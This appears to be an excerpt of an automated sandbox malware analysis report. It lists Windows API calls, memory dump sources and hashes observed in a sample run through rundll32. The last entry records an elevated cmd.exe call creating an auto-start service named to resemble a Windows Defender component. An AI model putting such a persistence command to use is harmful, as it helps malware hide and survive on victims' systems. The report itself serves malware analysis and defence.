                              • Instruction Fuzzy Hash: 33313C70E103599FEF10EFA8C896AAEB7B5EF44708F50646DD410A7290DBB4BD81CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,043CE986,?,043C0000,04611C1C), ref: 043CE908
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,043CE986,?,043C0000,04611C1C), ref: 043CE959
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName
                              • String ID:
                              • API String ID: 1159719554-0
                              • Opcode ID: b490a472f088e2e05983c04a02ebbda612f35c74f856c287b6ae2280d51ac590
                              • Instruction ID: c10b1725c4e41bd4c909b69e6ad1fbdf9c3bbf34341950405ff3397fb8c382fa
                              • Opcode Fuzzy Hash: b490a472f088e2e05983c04a02ebbda612f35c74f856c287b6ae2280d51ac590
                              • Instruction Fuzzy Hash: D7119170A4021CABEB24EB60CC8ABDDB3B8DF04704F5100AAE508A3290DA747F848F94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 498 43ea7e4-43ea7f3 499 43ea7fb-43ea81b FormatMessageW 498->499 500 43ea7f5 498->500 501 43ea81e-43ea820 499->501 500->499 502 43ea836-43ea859 call 43cae9c LocalFree 501->502 503 43ea822-43ea82e 501->503 504 43ea81d 503->504 505 43ea830-43ea834 503->505 504->501 505->502 505->504
                              APIs
                              • FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,0448398E,?,04483D27,04481F94,00000004,04481F90,00000000), ref: 043EA808
                              • LocalFree.KERNEL32(00000001,043EA861,00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,0448398E,?,04483D27,04481F94,00000004), ref: 043EA854
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: FormatFreeLocalMessage
                              • String ID:
                              • API String ID: 1427518018-0
                              • Opcode ID: 4736818aa8b365dd706e0126d85a60b14398a5d92320d23fa06421538f416782
                              • Instruction ID: 342273bfd18153011290e7bc924fce30582da79bcfc4bdeda5a3d538b8ceb998
                              • Opcode Fuzzy Hash: 4736818aa8b365dd706e0126d85a60b14398a5d92320d23fa06421538f416782
                              • Instruction Fuzzy Hash: 09014E307403187FF718A6568C51F7A7B6DEBC4B00F905079F500975C0D974BD128660
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(00000000,04476D20,?,?,04453834,00000001), ref: 04476C5E
                                • Part of subcall function 043E5EE4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,00000000,?,04453834,04476CA0,00000000,04476D20,?,?,04453834), ref: 043E5F33
                                • Part of subcall function 043E6CA4: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,00000000,?,04453834,04476CBB,00000000,04476D20,?,?,04453834,00000001), ref: 043E6CC7
                              • GetLastError.KERNEL32(00000000,04476D20,?,?,04453834,00000001), ref: 04476CC5
                                • Part of subcall function 043EA7E4: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,0448398E,?,04483D27,04481F94,00000004,04481F90,00000000), ref: 043EA808
                                • Part of subcall function 043EA7E4: LocalFree.KERNEL32(00000001,043EA861,00003300,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,0448398E,?,04483D27,04481F94,00000004), ref: 043EA854
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                              • String ID:
                              • API String ID: 503893064-0
                              • Opcode ID: 0e7c378644a501b00102fbeb075e044feb5eb43746c0bdf635fffc9ca9768af1
                              • Instruction ID: 0b8a71a87b14b44c9ccbefacbfd64e45bcdae294eea58e41d424ac6cda5ec44b
                              • Opcode Fuzzy Hash: 0e7c378644a501b00102fbeb075e044feb5eb43746c0bdf635fffc9ca9768af1
                              • Instruction Fuzzy Hash: D1419675E006198FEF00EFB9C8905EDBBA2EF49324F41813AD914A7381D7797906CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,043C8CEA,?,?,?,00000000), ref: 043C8CC9
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: CompareString
                              • String ID:
                              • API String ID: 1825529933-0
                              • Opcode ID: 24d857dd25249f956314096ef40dd640ce8defaa21b5c0af20165da048b815f0
                              • Instruction ID: 5eab66fe9a233e3998faec71b48bf6eacc9e7c839c317937eee33a43098215f1
                              • Opcode Fuzzy Hash: 24d857dd25249f956314096ef40dd640ce8defaa21b5c0af20165da048b815f0
                              • Instruction Fuzzy Hash: 7FF0A971204608BFEB01FA78AC52E5EB3ACDF48708B11547AF800E3250D664BE008B20
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,00000000,?,04453834,04476CA0,00000000,04476D20,?,?,04453834), ref: 043E5F33
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 694984720b49d28202ee96fc49cfeb0459fc1dda161e0020a62c544ccb96a37d
                              • Instruction ID: 4b08e0cb0496e1b320b914b2e604089e58e39f10d4c11b09463cf39c59e92136
                              • Opcode Fuzzy Hash: 694984720b49d28202ee96fc49cfeb0459fc1dda161e0020a62c544ccb96a37d
                              • Instruction Fuzzy Hash: 90E09BB2B511206AF72059ADAC91B1E914DC795B79F1D1131F615EB2C1D458FC028750
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleFileNameW.KERNEL32(043C0000,?,0000020A), ref: 043CD676
                                • Part of subcall function 043CE8CC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,043CE986,?,043C0000,04611C1C), ref: 043CE908
                                • Part of subcall function 043CE8CC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,043CE986,?,043C0000,04611C1C), ref: 043CE959
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: FileModuleName$LibraryLoad
                              • String ID:
                              • API String ID: 4113206344-0
                              • Opcode ID: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction ID: 83871993e0647659adf1595fdf71ff204be3f3835cdd8f309c35250a52558d53
                              • Opcode Fuzzy Hash: 53da31fff64a53f6825a8500a7483ba432167d46bc4a034368a05d7b6de3c32f
                              • Instruction Fuzzy Hash: 71E0ED71A003209BDB10DE5CC8C5A4677D4AF08754F445965AD28CF246D371ED24C7D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateDirectoryW.KERNEL32(00000000,00000000,?,045FD13D,00000000,045FD1B1), ref: 043E6DD5
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateDirectory
                              • String ID:
                              • API String ID: 4241100979-0
                              • Opcode ID: cd1659e6bb9119a660b7d3b90fe12127d90e6347a176cdf5c712bc9dde36e5e5
                              • Instruction ID: 2382cb32ee8a02965caa2246153fa5e36a33499c7f3eeae9bd06ef0346948f5e
                              • Opcode Fuzzy Hash: cd1659e6bb9119a660b7d3b90fe12127d90e6347a176cdf5c712bc9dde36e5e5
                              • Instruction Fuzzy Hash: 43B092A2B543801AFA003AB82CC2B2A408CAB1460EF102935F621C7181E866E8080210
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 043CAD03
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocString
                              • String ID:
                              • API String ID: 2525500382-0
                              • Opcode ID: 79ca62d7c2a33ec75572a5dd219f3eee2e30f94db15385c52f203ce866bf8487
                              • Instruction ID: 3288543fde6a2eed20c0e0d74c45529ef6d28605c4ff26aa4038ed229c1d870c
                              • Opcode Fuzzy Hash: 79ca62d7c2a33ec75572a5dd219f3eee2e30f94db15385c52f203ce866bf8487
                              • Instruction Fuzzy Hash: 79B0922420821A22F95030610E00736018C0B81641F883458AE11C00C1EA4BFC016739
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: InfoSystem
                              • String ID:
                              • API String ID: 31276548-0
                              • Opcode ID: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction ID: 9fc3609589f60d4b3d4444acd648e0f92f84fa61da8fb5f3449e4f92aeb406e4
                              • Opcode Fuzzy Hash: cfabf06fd0a7d5aa08c154ff74241a738d374e25dc305ab9149cadf724005ebe
                              • Instruction Fuzzy Hash: 42A012104084005AC804E7188C4240B71D01D40154FC40214645C95291E605AD6807D7
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,043C5CAB,FFFFFFDC,043C597E), ref: 043C56AB
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              • Opcode ID: 717d3d7518ec07121257a935db0bf558b9dfb0a988b5799c7b86753dfa9a7ed0
                              • Instruction ID: 127ba6fa6d0cf0134537e556665f2c83c243124f21b7120b1bceb0811cf48fad
                              • Opcode Fuzzy Hash: 717d3d7518ec07121257a935db0bf558b9dfb0a988b5799c7b86753dfa9a7ed0
                              • Instruction Fuzzy Hash: 26F08CF2B823115BE7188FB89A407067BD4E748354F18513FE949DB794E7B8AC408780
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 043CDFF5
                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 043CE006
                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 043CE106
                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 043CE118
                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 043CE124
                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 043CE169
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                              • String ID: GetLongPathNameW$\$kernel32.dll
                              • API String ID: 1930782624-3908791685
                              • Opcode ID: 55c8ba3158c1ac7a8eeceb4246eca1087be2b85e7d3de6dfb8db6a7143276e10
                              • Instruction ID: 1ddbf1303e1e771988ad997b363ece776bbe6ee85cef9386f79256e1017e0ec2
                              • Opcode Fuzzy Hash: 55c8ba3158c1ac7a8eeceb4246eca1087be2b85e7d3de6dfb8db6a7143276e10
                              • Instruction Fuzzy Hash: A841B432E00628ABDB20EFA8CC85ADDB3B6AF44314F1495BDD554E7240EB74BE55CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 045AA98E
                              • IsIconic.USER32(?), ref: 045AA9BC
                              • IsWindowVisible.USER32(?), ref: 045AA9CC
                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,045B7CEF,?,046201D8), ref: 045AA9E9
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 045AA9FC
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 045AAA0D
                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,045B7CEF,?,046201D8), ref: 045AAA2D
                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,045B7CEF,?,046201D8), ref: 045AAA37
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: Window$LongShow$IconicVisible
                              • String ID:
                              • API String ID: 3484284227-0
                              • Opcode ID: c74bf0e026c854b3b44ddba827d494ec2bf525f8a6b6d9999ba6dd5f4b26a9a2
                              • Instruction ID: 33721a9b0d1b9221be9e2badbb5cba7bf8b004776650f54d6e928b0ca043a7e7
                              • Opcode Fuzzy Hash: c74bf0e026c854b3b44ddba827d494ec2bf525f8a6b6d9999ba6dd5f4b26a9a2
                              • Instruction Fuzzy Hash: EE11C80214D6903AE32676253C01FAF1AD95F93214F184925F4E4920C2D329A915E236
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0460221C
                              Strings
                              Memory Dump Source
                              • Source File: 0000000C.00000002.2474320110.00000000043DC000.00000020.00000001.01000000.00000003.sdmp, Offset: 043C0000, based on PE: true
                              • Associated: 0000000C.00000002.2474294843.00000000043C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474320110.00000000043C1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474577843.0000000004611000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474604926.0000000004617000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474631109.0000000004618000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474658298.000000000461F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474684559.0000000004623000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474712649.0000000004625000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004626000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000C.00000002.2474740803.0000000004628000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_43c0000_rundll32.jbxd
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas
                              • API String ID: 587946157-3037528773
